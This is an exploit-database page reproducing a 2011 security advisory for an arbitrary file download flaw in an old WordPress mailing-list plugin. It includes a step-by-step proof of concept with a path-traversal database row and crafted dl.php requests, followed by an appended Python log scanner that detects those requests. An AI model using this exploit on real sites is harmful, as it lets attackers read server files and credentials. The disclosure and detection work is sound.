0day.today - Biggest Exploit Database in the World.
Wordpress Mailing List Plugin Arbitrary File Download
# Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
# Version: < 1.4.2
# Date: 2011-12-19
# Author: 6Scan (http://6scan.com) security team
# Software Link: http://wordpress.org/extend/plugins/mailz/
# Official fix: This advisory is released after the vendor (http://www.zingiri.com) was contacted and fixed the issue promptly.
# Description: Unauthorized users can download arbitrary files from the server using this exploit.
# The vulnerable script includes the config.php file, which connects to a database with the supplied credentials. Database entries are used to retrieve files from the host.
# The bug is in config.php, but it is accessible from another file.

PoC

1) Set up a MySQL database.

2) Create a table with the following structure:

    CREATE TABLE IF NOT EXISTS `phplist_attachment` (
      `filename` varchar(1024) NOT NULL,
      `mimetype` varchar(1024) NOT NULL,
      `remotefile` varchar(1024) NOT NULL,
      `description` varchar(1024) NOT NULL,
      `size` int(11) NOT NULL,
      `id` int(11) NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;

3) Add this row to the database:

    INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`)
    VALUES ('../../../../../somefile.txt', '', '', '', 0, 0);

4) Call the script with the database parameters and the file id to download:

    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0

The credentials are now saved in the session, and there is no need to continue passing them:

    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3

# 0day.today [2024-12-24] #
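
Detection example (added here, not part of the original advisory or the plugin's code): a log scan that flags requests to dl.php carrying the database connection parameters named above, plus later id-only requests from the same client. The combined access-log format, the function name scan, and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters the advisory shows being used to point the plugin at a
# caller-chosen database.
DB_OVERRIDE_PARAMS = {"wph", "wpdb", "user", "wpp"}
DL_SCRIPT = "/wp-content/plugins/mailz/lists/dl.php"

# Minimal matcher for Apache/nginx "combined" access-log lines (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

def scan(lines):
    """Return findings as (ip, kind, target) tuples.

    kind is "db-override" when dl.php is requested with database connection
    parameters, and "follow-up" for later id-only dl.php requests from an IP
    that already sent a db-override request (the session keeps the credentials).
    """
    findings = []
    flagged_ips = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m["target"])
        if url.path.lower() != DL_SCRIPT:
            continue  # parameters such as "user" are only suspicious on dl.php
        params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        if params & DB_OVERRIDE_PARAMS:
            flagged_ips.add(m["ip"])
            findings.append((m["ip"], "db-override", m["target"]))
        elif m["ip"] in flagged_ips and "id" in params:
            findings.append((m["ip"], "follow-up", m["target"]))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Dec/2011:10:00:01 +0000] "GET /wp-content/plugins/mailz/lists/dl.php?wph=db.example&wpdb=test&user=u&wpp=p&id=0 HTTP/1.1" 200 512 "-" "curl/7.21"',
    '203.0.113.7 - - [19/Dec/2011:10:00:05 +0000] "GET /wp-content/plugins/mailz/lists/dl.php?id=1 HTTP/1.1" 200 2048 "-" "curl/7.21"',
    '198.51.100.20 - - [19/Dec/2011:10:01:00 +0000] "GET /wp-content/plugins/mailz/lists/dl.php?id=4 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [19/Dec/2011:10:02:00 +0000] "GET /index.php?user=bob HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, kind, target in scan(SAMPLE_LOG):
        print(f"{kind:12} {ip:15} {target}")
```

The follow-up match keys on client IP only, so treat it as a lead for review rather than proof; requests with percent-encoded paths are not normalised by this scan.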